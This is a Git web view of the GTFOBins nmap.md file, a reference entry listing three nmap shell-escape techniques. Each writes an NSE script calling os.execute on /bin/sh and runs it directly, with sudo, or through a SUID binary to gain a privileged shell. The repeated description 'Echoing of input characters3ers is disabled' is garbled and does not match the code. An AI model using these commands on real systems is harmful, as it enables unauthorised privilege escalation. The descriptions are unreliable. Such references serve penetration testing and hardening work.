GTFOBins.github.io/_gtfobins/nmap.md

19 lines
601 B
Markdown
Raw Normal View History

2018-08-17 15:16:09 +00:00
---
functions:
execute-non-interactive:
- description: Echoing of input characters3ers is disabled.
code: |
echo 'os.execute("/bin/sh")' > /tmp/script.nse
nmap --script=/tmp/script.nse
2018-08-17 15:16:09 +00:00
sudo-enabled:
- description: Echoing of input characters3ers is disabled.
code: |
echo 'os.execute("/bin/sh")' > /tmp/script.nse
sudo nmap --script=/tmp/script.nse
suid-enabled:
- description: Echoing of input characters3ers is disabled.
code: |
echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
./nmap --script=/tmp/script.nse
2018-08-17 15:16:09 +00:00
---